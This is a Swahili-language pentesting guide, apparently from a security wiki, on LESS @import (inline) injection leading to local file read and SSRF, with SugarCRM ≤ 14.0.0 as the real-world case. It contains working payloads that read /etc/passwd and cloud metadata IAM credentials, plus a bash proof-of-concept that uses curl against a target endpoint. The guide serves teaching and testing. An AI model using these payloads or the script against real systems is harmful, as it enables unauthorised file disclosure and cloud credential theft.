LESS Code Injection inayosababisha SSRF & Local File Read

LESS ni pre-processor maarufu wa CSS ambao unaongeza variables, mixins, functions na directive yenye nguvu ya @import. Wakati wa compilation engine ya LESS itafanya kuleta rasilimali zilizorejelezwa katika @import statements na kuingiza ("inline") yaliyomo ndani ya CSS inayotokana wakati chaguo (inline) kinapotumika.

Wakati programu inapochanganya user-controlled input ndani ya string ambayo baadaye inachambuliwa na LESS compiler, mshambuliaji anaweza kuingiza arbitrary LESS code. Kwa kudhulumu @import (inline) mshambuliaji anaweza kulazimisha server kutafuta:

  • Local files via the file:// protocol (information disclosure / Local File Inclusion).
  • Remote resources on internal networks or cloud metadata services (SSRF).

Mbinu hii imeonekana katika bidhaa za ulimwengu halisi kama SugarCRM ≤ 14.0.0 (/rest/v10/css/preview endpoint).

Exploitation

  1. Tambua parameter ambayo imeingizwa moja kwa moja ndani ya stylesheet string processed by the LESS engine (mfano ?lm= katika SugarCRM).
  2. Funga current statement na ingiza directives mpya. The most common primitives are:
  • ; – inamaliza the previous declaration.
  • } – inafunga the previous block (if required).
  1. Use @import (inline) '<URL>'; kusoma arbitrary resources.
  2. Kwa hiari ingiza marker (data: URI) baada ya import ili kurahisisha extraction ya yaliyopatikana kutoka kwa compiled CSS.

Local File Read

1; @import (inline) 'file:///etc/passwd';
@import (inline) 'data:text/plain,@@END@@'; //

Yaliyomo katika /etc/passwd yataonekana katika majibu ya HTTP mara tu kabla ya alama ya @@END@@.

SSRF – Cloud Metadata

1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/";
@import (inline) 'data:text/plain,@@END@@'; //

PoC ya Otomatiki (mfano wa SugarCRM)

bash
#!/usr/bin/env bash
# Usage: ./exploit.sh http://target/sugarcrm/ /etc/passwd

TARGET="$1"        # Base URL of SugarCRM instance
RESOURCE="$2"      # file:// path or URL to fetch

INJ=$(python -c "import urllib.parse,sys;print(urllib.parse.quote_plus(\"1; @import (inline) '$RESOURCE'; @import (inline) 'data:text/plain,@@END@@';//\"))")

curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
sed -n 's/.*@@END@@\(.*\)/\1/p'

Mifano ya Maisha Halisi

BidhaaEndpoint iliyoathirikaMadhara
SugarCRM ≤ 14.0.0/rest/v10/css/preview?lm=Isiyothibitishwa SSRF & local file read

Marejeo